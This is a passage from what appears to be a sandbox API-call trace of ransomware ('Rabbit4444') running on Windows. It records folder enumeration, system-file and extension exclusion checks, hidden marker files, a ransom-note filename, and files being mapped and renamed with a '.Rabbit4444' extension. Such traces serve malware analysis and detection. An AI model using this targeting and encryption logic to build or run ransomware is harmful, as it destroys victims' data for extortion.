dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0063.663] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0063.665] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.665] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.665] CloseHandle (hObject=0x278) returned 1 [0063.665] CloseHandle (hObject=0x298) returned 1 [0063.665] GetCurrentThreadId () returned 0xd98 [0063.665] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122008 [0063.665] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\SystemAppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\SystemAppData" [0063.665] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108688 | out: hHeap=0xe0000) returned 1 [0063.665] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122000 | out: hHeap=0xe0000) returned 1 [0063.665] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\SystemAppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\SystemAppData" [0063.665] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\SystemAppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\SystemAppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\SystemAppData\\" [0063.665] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\SystemAppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3" [0063.666] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\systemappdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0063.667] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.670] FlushFileBuffers (hFile=0x298) returned 1 [0063.670] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.671] CloseHandle (hObject=0x298) returned 1 [0063.671] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\SystemAppData") returned 102 [0063.671] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.671] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\SystemAppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefc6e47f, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xefc6e47f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xef463a07, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102910 [0063.671] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.671] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.671] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.672] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.672] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefc6e47f, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xefc6e47f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xef463a07, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.672] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.672] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.672] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.672] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.672] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.672] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef463a07, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef463a07, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef463a07, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.672] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.672] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.672] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef463a07, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef463a07, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef463a07, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0063.672] FindClose (in: hFindFile=0x102910 | out: hFindFile=0x102910) returned 1 [0063.672] lstrcpyW (in: lpString1=0x130ec06, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.672] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\SystemAppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\systemappdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0063.673] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0063.673] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.673] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.673] CloseHandle (hObject=0x278) returned 1 [0063.673] CloseHandle (hObject=0x298) returned 1 [0063.673] GetCurrentThreadId () returned 0xd98 [0063.673] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122288 [0063.673] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\Settings", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\Settings" [0063.674] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1166c0 | out: hHeap=0xe0000) returned 1 [0063.674] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122280 | out: hHeap=0xe0000) returned 1 [0063.674] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\Settings" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\Settings" [0063.674] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\Settings", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\Settings\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\Settings\\" [0063.674] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\Settings\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3" [0063.674] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\settings\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0063.676] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.679] FlushFileBuffers (hFile=0x298) returned 1 [0063.680] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.680] CloseHandle (hObject=0x298) returned 1 [0063.680] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\Settings") returned 97 [0063.680] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.680] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\Settings\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3de35df, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x7133ee1b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xef463a07, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a10 [0063.681] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.681] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.681] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.681] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.681] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3de35df, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x7133ee1b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xef463a07, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.681] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.681] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.681] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.681] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.681] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.681] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef463a07, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef463a07, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef463a07, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.681] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.681] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.681] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3de35df, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xe3de35df, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xe3de35df, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0063.681] lstrcmpiW (lpString1="roaming.lock", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.681] lstrcmpiW (lpString1="roaming.lock", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.681] lstrcmpiW (lpString1="roaming.lock", lpString2="Rabbit4444.exe") returned 1 [0063.681] lstrcmpiW (lpString1="roaming.lock", lpString2=".") returned 1 [0063.681] lstrcmpiW (lpString1="roaming.lock", lpString2="..") returned 1 [0063.681] lstrcmpiW (lpString1="roaming.lock", lpString2="windows") returned -1 [0063.681] lstrcmpiW (lpString1="roaming.lock", lpString2="bootmgr") returned 1 [0063.681] lstrcmpiW (lpString1="roaming.lock", lpString2="pagefile.sys") returned 1 [0063.681] lstrcmpiW (lpString1="roaming.lock", lpString2="boot") returned 1 [0063.681] lstrcmpiW (lpString1="roaming.lock", lpString2="ids.txt") returned 1 [0063.681] lstrcmpiW (lpString1="roaming.lock", lpString2="NTUSER.DAT") returned 1 [0063.681] lstrcpyW (in: lpString1=0x130ebfc, lpString2="roaming.lock" | out: lpString1="roaming.lock") returned="roaming.lock" [0063.681] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\Settings\\roaming.lock", dwFileAttributes=0x0) returned 1 [0063.682] lstrlenW (lpString="roaming.lock") returned 12 [0063.682] lstrlenW (lpString="Rabbit4444") returned 10 [0063.682] lstrcmpiW (lpString1="aming.lock", lpString2="Rabbit4444") returned -1 [0063.682] lstrlenW (lpString=".dll") returned 4 [0063.682] lstrcmpiW (lpString1="lock", lpString2=".dll") returned 1 [0063.682] lstrlenW (lpString=".lnk") returned 4 [0063.682] lstrcmpiW (lpString1="lock", lpString2=".lnk") returned 1 [0063.682] lstrlenW (lpString=".ini") returned 4 [0063.682] lstrcmpiW (lpString1="lock", lpString2=".ini") returned 1 [0063.682] lstrlenW (lpString=".sys") returned 4 [0063.682] lstrcmpiW (lpString1="lock", lpString2=".sys") returned 1 [0063.682] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3de35df, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf549855f, ftLastAccessTime.dwHighDateTime=0x1d336cd, ftLastWriteTime.dwLowDateTime=0xf549855f, ftLastWriteTime.dwHighDateTime=0x1d336cd, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0063.682] lstrcmpiW (lpString1="settings.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.682] lstrcmpiW (lpString1="settings.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.682] lstrcmpiW (lpString1="settings.dat", lpString2="Rabbit4444.exe") returned 1 [0063.682] lstrcmpiW (lpString1="settings.dat", lpString2=".") returned 1 [0063.682] lstrcmpiW (lpString1="settings.dat", lpString2="..") returned 1 [0063.682] lstrcmpiW (lpString1="settings.dat", lpString2="windows") returned -1 [0063.682] lstrcmpiW (lpString1="settings.dat", lpString2="bootmgr") returned 1 [0063.682] lstrcmpiW (lpString1="settings.dat", lpString2="pagefile.sys") returned 1 [0063.682] lstrcmpiW (lpString1="settings.dat", lpString2="boot") returned 1 [0063.682] lstrcmpiW (lpString1="settings.dat", lpString2="ids.txt") returned 1 [0063.682] lstrcmpiW (lpString1="settings.dat", lpString2="NTUSER.DAT") returned 1 [0063.682] lstrcpyW (in: lpString1=0x130ebfc, lpString2="settings.dat" | out: lpString1="settings.dat") returned="settings.dat" [0063.682] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\Settings\\settings.dat", dwFileAttributes=0x0) returned 1 [0063.683] lstrlenW (lpString="settings.dat") returned 12 [0063.683] lstrlenW (lpString="Rabbit4444") returned 10 [0063.683] lstrcmpiW (lpString1="ttings.dat", lpString2="Rabbit4444") returned 1 [0063.683] lstrlenW (lpString=".dll") returned 4 [0063.683] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0063.683] lstrlenW (lpString=".lnk") returned 4 [0063.683] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0063.683] lstrlenW (lpString=".ini") returned 4 [0063.683] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0063.683] lstrlenW (lpString=".sys") returned 4 [0063.683] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0063.683] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\settings\\settings.dat"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0063.684] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0063.684] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15499457841) returned 1 [0063.684] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=16384) returned 1 [0063.684] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0063.684] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0063.684] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4300, lpName=0x0) returned 0x2a0 [0063.688] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4300) returned 0x70000 [0063.690] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x123760 [0063.690] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0063.690] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123760 | out: hHeap=0xe0000) returned 1 [0063.690] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0063.690] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x123760 [0063.691] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0063.691] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123760 | out: hHeap=0xe0000) returned 1 [0063.691] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0063.691] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15500141586) returned 1 [0063.691] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0063.691] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0063.691] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.691] CloseHandle (hObject=0x2a0) returned 1 [0063.691] CloseHandle (hObject=0x278) returned 1 [0063.691] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\Settings\\settings.dat.Rabbit4444") returned 121 [0063.691] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\settings\\settings.dat"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\Settings\\settings.dat.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\settings\\settings.dat.rabbit4444"), dwFlags=0x1) returned 1 [0063.692] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xeaed6ff3, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xeaed6ff3, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xeaed6ff3, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG1", cAlternateFileName="SETTIN~1.LOG")) returned 1 [0063.692] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.692] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.692] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="Rabbit4444.exe") returned 1 [0063.692] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2=".") returned 1 [0063.692] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="..") returned 1 [0063.692] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="windows") returned -1 [0063.692] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="bootmgr") returned 1 [0063.692] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="pagefile.sys") returned 1 [0063.692] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="boot") returned 1 [0063.692] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="ids.txt") returned 1 [0063.692] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="NTUSER.DAT") returned 1 [0063.692] lstrcpyW (in: lpString1=0x130ebfc, lpString2="settings.dat.LOG1" | out: lpString1="settings.dat.LOG1") returned="settings.dat.LOG1" [0063.692] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1", dwFileAttributes=0x22) returned 1 [0063.692] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1", dwFileAttributes=0x6) returned 1 [0063.693] lstrlenW (lpString="settings.dat.LOG1") returned 17 [0063.693] lstrlenW (lpString="Rabbit4444") returned 10 [0063.693] lstrcmpiW (lpString1="s.dat.LOG1", lpString2="Rabbit4444") returned 1 [0063.693] lstrlenW (lpString=".dll") returned 4 [0063.693] lstrcmpiW (lpString1="LOG1", lpString2=".dll") returned 1 [0063.693] lstrlenW (lpString=".lnk") returned 4 [0063.693] lstrcmpiW (lpString1="LOG1", lpString2=".lnk") returned 1 [0063.693] lstrlenW (lpString=".ini") returned 4 [0063.693] lstrcmpiW (lpString1="LOG1", lpString2=".ini") returned 1 [0063.693] lstrlenW (lpString=".sys") returned 4 [0063.693] lstrcmpiW (lpString1="LOG1", lpString2=".sys") returned 1 [0063.693] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\settings\\settings.dat.log1"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0063.693] QueryPerformanceFrequency (in: 